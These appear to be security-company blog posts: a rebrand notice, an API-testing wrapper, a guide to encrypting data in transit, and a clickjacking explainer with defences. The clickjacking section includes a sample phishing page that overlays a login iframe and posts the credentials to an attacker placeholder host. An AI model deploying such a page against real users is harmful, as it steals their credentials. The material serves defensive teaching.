It’s official: Raxis has a new logo, a new look, and a new website that better represents the full range of services we offer. We’re excited about the rollout and thought it might be a good idea to explain the story behind the look.
Raxis CEO Mark Puckett launched our company in 2011 because he saw a glaring need for penetration testing that was more than just a checkbox exercise. Corporations needed to be challenged by innovative and relentless professionals who color outside the lines just like the bad guys. In the years since, we’ve established an incredible track record for successfully hacking into networks protected by some of the most advanced and sophisticated security available.
For the most part, our mission has been our marketing. Companies that have used our services are often amazed at how rapidly we can breach their defenses. Word spread quickly that your system hasn’t been tested until it’s been Raxis-tested. Our website and marketing materials, though effective, were secondary. As we take the company to the next level, however, we decided our brand needs to more accurately represent who we are and what (all) we do.
As you visit the new Raxis.com, here are some cool things to look for:
Yin and Yang: Notice the juxtaposition of red and blue, representing the two prominent aspects of our business. Red for attack. Blue for defense. It’s based on a martial arts principle – “The hand that strikes also blocks.”
The X-Factor: Take a close look at the ‘x’ in Raxis and you’ll see it’s the intersection of red and blue arrows. Red is dominant because all of our services are born from and based on our unrivaled attack skills.
The Color Purple: Most of our services fit pretty neatly into the attack or protect categories, but some are specialized or a mixture of the two. If you guessed that we created a new purple category for those, give yourself a pat on the back.
Tongue Meets Cheek: It’s hard to say if we have a lot of fun because we’re so good at our jobs – or if we’re that good because we have so much fun. Either way, we wanted our website to ‘sound’ like us, so, as you scroll through, notice that there’s a little lighter tone to much of our language. We take our jobs seriously, but we don’t peddle fear.
4-0-Funny: As is always the case with a new website, we may lose or misname a link somewhere along the way. If that happens, wait a second and you’ll at least get a little entertainment for your trouble.
We hope you find the new site helpful, informative, and even entertaining. But if you find a mistake or a broken link, please let us know.
At Raxis we perform several API penetration tests each year. Our lead developer, Adam Fernandez, has built a tool for testing JSON-based REST APIs, and we're sharing it on GitHub to help API developers test their own code during the SDLC and prepare for third-party API penetration tests. This code does not work on its own… it's a base that API developers can customize specifically for their code. You can find the tool at https://github.com/RaxisInc/api-tool.
Here’s a basic overview of the tool from Adam himself:
The Raxis API tool is a simple Node.js class built for assessing API endpoints. The class is designed to be fully extensible and modifiable to support many different types of JSON-based REST APIs. It automatically handles token-based authentication, proxies requests, and exposes several functions designed to make it easier and faster to write a wrapper around an API and associated test code for the purposes of a penetration test. This tool is not designed to work on its own, but to serve as a building block and quickstart for code-based API penetration testing.
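To make the idea concrete, here's a minimal sketch of the kind of wrapper the tool is designed to jump-start. The class, endpoint, and field names below are our own illustration, not the actual tool's API; pull the real thing from GitHub. It assumes Node 18+ for the built-in fetch():

```javascript
// Illustrative only: a tiny JSON REST API test harness in the spirit of
// the Raxis tool. Endpoint paths and response fields vary per target API.
class ApiClient {
  constructor(baseUrl, { tokenEndpoint = '/auth/login' } = {}) {
    this.baseUrl = baseUrl;
    this.tokenEndpoint = tokenEndpoint; // hypothetical default
    this.token = null;
  }

  // Obtain a bearer token; the request and response field names differ per API.
  async authenticate(username, password) {
    const res = await fetch(this.baseUrl + this.tokenEndpoint, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({ username, password }),
    });
    if (!res.ok) throw new Error(`auth failed: ${res.status}`);
    this.token = (await res.json()).token;
  }

  // Generic JSON request wrapper; per-endpoint test code builds on this.
  async request(method, path, body) {
    const res = await fetch(this.baseUrl + path, {
      method,
      headers: {
        'Content-Type': 'application/json',
        ...(this.token && { Authorization: `Bearer ${this.token}` }),
      },
      body: body === undefined ? undefined : JSON.stringify(body),
    });
    return { status: res.status, body: await res.json().catch(() => null) };
  }
}

// Example test flow: authenticate, then probe an endpoint.
// const api = new ApiClient('https://api.example.com');
// await api.authenticate('testuser', 'testpass');
// console.log(await api.request('GET', '/users/1'));
```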
Ask any penetration tester at Raxis, and they’ll tell you that we see insecure transmission of private data, often in the form of usernames and passwords, on many of the web application and external penetration tests we perform. There are a number of easily discoverable issues in play that can assist an attacker in gaining access to private information and internal systems. These vulnerabilities are a part of A3-Sensitive Data Exposure in OWASP’s 2017 Top 10 list.
Encrypting Data in Transit
Say you’re on a public Wi-Fi network at a coffee shop or a hotel, or even a private network that’s been compromised in a previous attack. An attacker on the same network can sniff traffic as it’s sent across the network or even outside of the network to the Internet. This is called a Man in the Middle (MitM) attack. Users on the network have no way to know that an attacker is monitoring their network traffic in this way.
To mimic a MitM attack, I used Wireshark to capture the network traffic from my own computer. First, I logged in to a website that does not use encryption. This site uses HTTP to send the credentials in cleartext, which you can see listed in the captured POST request below:
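A cleartext login request of this kind looks something like the following (the host and credentials here are made up for illustration):

```
POST /login HTTP/1.1
Host: notasecuresite.example
Content-Type: application/x-www-form-urlencoded

username=jsmith&password=Winter2018!
```

Anyone positioned on the network path sees these values exactly as written.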
Now, let’s see what happens when I submit my credentials over an encrypted HTTPS connection:
Even though I can sniff all network traffic between my computer and the website, I cannot read the data itself. Private data such as user credentials, session tokens, and credit card numbers should always be encrypted in transit using HTTPS to protect users from MitM attacks.
Encoding is Not Encryption
We often run into websites that use Base64 or another form of encoding to protect data. It's important to note that while encoding can protect data from accidental manipulation or make it easier to send and store, it offers no more security than leaving the data in cleartext. The fundamental difference between encoding and encryption is that encoding is intentionally designed to be reversed without a key or secret, while encryption is designed to protect data from anyone who lacks that key or secret.
In the example below, I used a free base64 decoding website. Feel free to use this website to see how easily you can decode the base64-encoded value:
RHJpbmsgWW91ciBPdmFsdGluZQ==
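Or skip the website entirely; one line of Node.js, using only the built-in Buffer class and no key or secret of any kind, recovers the message:

```javascript
// Base64 "protection" reverses with a single call -- no key required.
console.log(Buffer.from('RHJpbmsgWW91ciBPdmFsdGluZQ==', 'base64').toString('utf8'));
```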
SSL Certificates
Now that you understand that sending private data in cleartext (or base64) is a bad idea and you've decided to use HTTPS for your site, you still need a valid SSL certificate before your site is secure. Without one, browsers will warn that your site is not secure, as my browser did for the Nessus site that I run on my computer.
While errors like this can be acceptable on a private computer where I know what the site is and where it's running, they are not acceptable for an external website or an internal corporate network. An attacker might present an invalid certificate such as the one above on a malicious site that impersonates a legitimate one. Without a valid certificate, you cannot be sure whether the site is genuine and safe.
As a comparison, here is a site that uses a valid SSL certificate. The browser checks the certificate and validates that it’s secure.
The browser also allows you to view the certificate yourself, should you want more detailed information about the issuer, subject, or public key. There you can see exactly why the browser declares the certificate secure:
It’s issued by a trusted Certificate Authority (CA), in this case a free CA called Let’s Encrypt
It hasn’t expired yet
It uses a strong encryption algorithm for the public key
This brings up a few common issues we see that make certificates insecure:
The certificate is expired. Many companies don't have a master list of certificates and their expiration dates, which can lead to forgotten certificates that don't get replaced until a penetration test or customer complaint highlights the issue. (A sketch at the end of this section shows one way to check expiration programmatically.)
The certificate is for the wrong website. Occasionally, companies may point additional domain names at a server that uses the certificate, or change existing ones, without updating the certificate itself. Since the certificate wasn't issued for the new or modified domains, it is not valid for them.
The certificate is self-signed. While it’s generally okay to self-sign certificates for fully internal sites provided the signing authority has been added to the trusted certificate store for all devices on the network, all external-facing sites should use an SSL certificate signed by a trusted Certificate Authority (CA).
The dangers with untrusted self-signed certificates are:
An attacker could create their own self-signed certificate that looks nearly identical to the legitimate one.
Many users will refuse to use the site because of the security errors browsers will show.
Users who are willing to use the site will become accustomed to using sites with certificate errors, making them more likely to ignore these errors on a malicious site.
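One way to stay ahead of these issues, as promised above, is to check certificates programmatically. Here's a minimal Node.js sketch using the built-in tls module; the host is just an example, and any TLS-speaking server works:

```javascript
// Connect to a host and print the certificate details a browser would
// check: subject, issuer, and validity window.
const tls = require('tls');

const host = 'raxis.com'; // replace with any host you want to inspect

const socket = tls.connect(443, host, { servername: host }, () => {
  const cert = socket.getPeerCertificate();
  console.log('Subject:', cert.subject.CN);
  console.log('Issuer: ', cert.issuer.CN);
  console.log('Expires:', cert.valid_to);
  console.log('Trusted:', socket.authorized); // false for self-signed or untrusted CAs
  socket.end();
});
```

Run on a schedule against your company's certificate inventory, a script like this catches expiring or misissued certificates before a browser warning or a penetration test does.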
Encryption Ciphers and Protocols
Now that your webpages are being served over HTTPS with a valid certificate, let's think about the strength of the encryption itself. Think of Julius Caesar using the now-famous Caesar cipher to encrypt secret military messages. Centuries later, it's best not to use that cipher: it was cracked long ago, and the method is common knowledge. If you're interested in the history of encryption, Simon Singh's The Code Book is a great read.
For the purposes of securing a website, we need to use strong encryption protocols and ciphers. Because attackers are always looking for flaws in these protections, we must stay a step ahead and avoid weak ciphers and protocols. SSLScan is a free tool that runs on Linux, Windows, and macOS; it shows all the protocols and ciphers that a site accepts, and weak protocols and ciphers, if enabled, are listed in yellow or red. Here is an SSLScan of https://raxis.com/. For a free online tool that can assess the ciphers and protocols on external-facing sites, check out Qualys' SSL Server Test.
Two types of protocols are commonly used: SSL (Secure Sockets Layer) and TLS (Transport Layer Security). All versions of SSL have been compromised and should not be used. There are multiple known exploits that attackers can use to gain access to your data or cause a denial of service if the data is transmitted using SSL. At the time of writing, the recommended protocol is TLSv1.2, although TLSv1.1 can be secure if configured correctly. TLSv1.3 is currently being drafted, so keep an eye out for it in the future. We always recommend removing weak protocols, such as SSLv2, SSLv3, and TLSv1.0, because SSL/TLS implementations support protocol negotiation that an attacker can abuse to downgrade a connection from a server's secure protocols to weaker ones.
Each protocol provides many cipher suites, some more secure than others. Weak ciphers must be explicitly disabled on the server to ensure that cryptographically strong ciphers are used when transmitting private data. In the example above, https://raxis.com/ only uses strong ciphers and protocols.
What Web Developers Can Do to Protect Their Sites
There are a number of things that web developers and administrators can do to keep their sites secure and their users safe.
Ensure that all private data, including credentials, session tokens, credit cards, medical data, and so on, is encrypted in transit by enforcing the use of HTTPS.
All resources on a page must be encrypted for the page to be considered secure. This means that graphics, scripts, and other behind-the-scenes files should be served over HTTPS as well.
Use only certificates issued by a trusted Certificate Authority (CA).
Replace certificates before they expire. Keep track of your company's certificates using a tool such as Venafi's TLS Protect, which can even replace expiring certificates automatically.
Use the TLSv1.2 protocol and disable older protocols where possible. If your site needs to support browser versions released prior to 2013, enable TLSv1.1 as well, as those older browsers do not support TLSv1.2. See Can I Use to check which browsers support TLSv1.2.
Disable weak ciphers within your protocols' cipher suites; a configuration sketch follows this list. Test thoroughly before making changes in production to ensure that your site doesn't have outages. OWASP's Transport Layer Protection Cheat Sheet is a great resource.
Annual penetration tests can help ensure your web applications and external network continue to provide strong encryption to your users. Raxis' Baseline Security Assessment can also help you keep a monthly watch for any issues.
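Here is the configuration sketch referenced above: a Node.js HTTPS server pinned to TLSv1.2 and a restricted cipher list. The file paths and cipher choices are placeholders (consult OWASP's cheat sheet for current guidance), equivalent settings exist in Apache, nginx, and IIS, and recent Node.js versions support the minVersion option:

```javascript
// Sketch: an HTTPS server that refuses SSLv3/TLSv1.0/TLSv1.1 and weak ciphers.
const https = require('https');
const fs = require('fs');

const server = https.createServer({
  key: fs.readFileSync('/path/to/privkey.pem'),   // placeholder paths
  cert: fs.readFileSync('/path/to/fullchain.pem'),
  minVersion: 'TLSv1.2',                          // disable older protocols
  ciphers: 'ECDHE-RSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384', // illustrative list
  honorCipherOrder: true,                         // prefer the server's cipher order
}, (req, res) => res.end('Hello over TLS 1.2+'));

server.listen(8443);
```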
What Users Can Do to Protect Themselves
While it’s up to website administrators to keep websites secure, users of these sites can keep themselves safe by being vigilant. Watch your browser, and never enter private data such as passwords, credit card numbers, or medical information if the website you’re using:
Starts with http://
Starts with https:// but shows a security error
Close your browser if you see a security error when you are already logged in. Your private data could be sniffed by an attacker every time you submit a form or click a link.
When on public Wi-Fi, such as free Wi-Fi offered in hotels or restaurants, use a VPN such as Private Internet Access to ensure your private information is encrypted in transit.
Many of the external network and web application penetration tests that we perform list ‘clickjacking’ as a vulnerability. We find that many website developers, as well as many users, do not fully understand what clickjacking is. While clickjacking is not exploitable to gain system access on its own, this web configuration vulnerability can be used to gather valid credentials that can lead to system access when paired with a social engineering attack such as phishing. Clickjacking falls under the A6 – Security Misconfiguration item in OWASP’s 2017 Top 10 list.
A LOOK AT HOW IT WORKS
Clickjacking uses a genuine webpage, usually a login page, to trick users into entering private information such as credentials. To show how this works, we created a sample login page for a great little app called Not a Secure Site.
As the page does not implement clickjacking protections, an attacker can quickly and easily clone the page by placing it within an HTML iframe on their own website. By overlaying their own username, password, and sign in button elements on a layer above the iframe, the attacker can capture any credentials the user believes they are entering into the original login form. The example below shows how the attacker’s cloned page might look. Can you tell the difference between the real site and this malicious site?
Without inspecting the source code of the malicious page, the content of the page appears identical to the legitimate one. Now, let’s highlight the overlaid text fields and button fields in blue so we can see where the magic takes place:
Those fields are in a layer of HTML that sits on top of the iframe containing Not a Secure Site’s login page. When an unsuspecting user enters their credentials on this page, they are entering them into the attacker’s text fields and clicking the attacker’s button. Let’s add a border around the iframe on the attacker’s website:
Here we can clearly see where the attacker has embedded Not a Secure Site’s login page into the malicious site. Using Burp Intercept, we can watch the HTTP request. For this example, I simply set the attacker’s form to POST to the Raxis website. In the intercepted request below, we can see that the credentials entered into the form are sent to the attacker’s site instead of to Not a Secure Site.
This is all very clever, but it doesn’t mean a thing if a user never enters credentials. This type of attack must be used as part of a larger attack, generally a phishing attack that encourages the target to click a URL in an email. The HTML code on the malicious page can be remarkably simple: the attacker needs only to create and properly position text fields and a button on the page, and the iframe does the rest!
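To show just how simple, here’s a stripped-down sketch of such a page; the URLs and pixel coordinates are invented for this example:

```html
<!-- Clickjacking overlay sketch: the real site loads in a full-page iframe,
     and the attacker's own form sits on top of its login fields. -->
<iframe src="https://notasecuresite.example/login"
        style="position:absolute; top:0; left:0; width:100%; height:100%; border:none;">
</iframe>

<!-- Credentials typed into these fields go to the attacker, not the site. -->
<form action="https://attacker.example/steal" method="POST"
      style="position:absolute; top:220px; left:480px;">
  <input type="text" name="username">
  <input type="password" name="password">
  <button type="submit">Sign In</button>
</form>
```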
In more advanced clickjacking attacks, an attacker can log your credentials as you type them, capturing your username and password before you even submit the form.
WHAT WEB DEVELOPERS CAN DO TO PROTECT THEIR SITES
So, what makes this webpage vulnerable, and what could the website’s developer do differently to fix it? It all comes down to preventing the page from being embedded in an iframe. Modern browsers look for the X-Frame-Options header to determine whether another site is permitted to present the page in an iframe. Looking at the HTTP response for Not a Secure Site’s login page, we see that the site does not set the X-Frame-Options header, so browsers fall back to their default behavior of allowing any site to embed the page in an iframe.
The X-Frame-Options header can be set dynamically in server-side code or configured on a global level through the web server or proxy configuration. The X-Frame-Options header allows three possible values:
DENY
SAMEORIGIN
ALLOW-FROM uri
If the website never needs to be embedded in an iframe, the developer should use the DENY value to block all iframes. Here’s what the attacker’s website looks like when Not a Secure Site has set the X-Frame-Options response header for the entire website to DENY. The header prevents the login page from rendering within the iframe.
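Setting the header is typically a one-liner. As a minimal sketch, here’s how a plain Node.js server might send it on every response; in practice you would usually configure this in framework middleware or at the web server or proxy level:

```javascript
// Send X-Frame-Options on every response so browsers refuse to render
// these pages inside another site's iframe.
const http = require('http');

http.createServer((req, res) => {
  res.setHeader('X-Frame-Options', 'DENY'); // or 'SAMEORIGIN'
  // The Content-Security-Policy alternative discussed below:
  res.setHeader('Content-Security-Policy', "frame-ancestors 'none'");
  res.end('This page cannot be framed.');
}).listen(8080);
```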
The SAMEORIGIN value can be set if the webpage needs to appear within an iframe on its own site. The ALLOW-FROM uri value is not recommended because it’s not supported by all browsers.

While the X-Frame-Options header is the best defense against clickjacking attacks, the Content-Security-Policy header’s frame-ancestors directive can also restrict which domains are allowed to place the website in a frame, though frame-ancestors is not yet supported in all major browsers. OWASP has a great Clickjacking Defense Cheat Sheet explaining these options in detail, as well as older methods that do not work well and are not advised. The OWASP Secure Headers Project is another great resource worth checking out.

Raxis offers several penetration tests that alert customers to websites that are vulnerable to clickjacking. Check out our Web Application Penetration Testing service to get started. If a full penetration test is not within your company’s needs or budget, take a look at our Baseline Security Assessment option, which also highlights clickjacking vulnerabilities.

It’s important to note that some phishing attacks copy webpage code, instead of embedding the page in an iframe, to achieve the same results. Depending on the webpage, this can be complicated and may require advanced knowledge of HTML, JavaScript, and CSS. When an attacker produces a convincing clone of a website without using an iframe, no form of clickjacking protection, including X-Frame-Options, can prevent the attack.
WHAT USERS CAN DO TO PROTECT THEMSELVES
Clickjacking recommendations are often focused on what web developers and website administrators can do to protect users, but what can you do as a user?

Keep in mind that the attacker has to trick you into using their website. Whether they do this through an email, a flyer, a poster on a wall, or a casual mention in conversation, it’s always a good idea to verify that the link you are using is legitimate. If you’re at work, check with your IT department; if you’re a user of a consumer site, go to the genuine site and use the contact form or phone number there to verify the link.

Remember that links can be masked to look like something else. Hover over links in emails and webpages to see what URL they truly point to, and look at URLs carefully to see if they are legitimate. Attackers often buy domain names that look a lot like the true website’s domain in the hopes that their targets will not look closely.

See our recent phishing blog post to learn more about protecting yourself from phishing attacks.